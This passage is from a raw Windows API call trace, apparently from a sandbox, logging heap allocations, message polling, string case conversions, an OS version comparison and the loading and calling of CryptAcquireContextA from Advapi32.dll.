Flags=0x0, Size=0x4) returned 0x24b1798 [0199.314] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0199.314] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.314] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0199.314] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.314] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0199.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.314] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.315] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.315] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.315] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.315] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0199.315] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.315] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0199.315] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.316] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0199.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.316] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0199.316] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0199.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0199.316] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0199.316] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.316] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0199.316] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.316] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.316] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.316] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0199.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.317] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0199.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0199.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0199.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0199.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0199.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0199.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0199.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.318] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0199.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.318] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0199.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0199.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0199.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.318] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0199.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0199.318] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0199.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.319] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.319] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0199.319] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.321] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0199.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0199.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0199.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.322] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0199.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0199.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0199.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.323] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0199.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0199.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0199.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0199.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0199.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0199.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.323] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad6480) returned 1 [0199.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 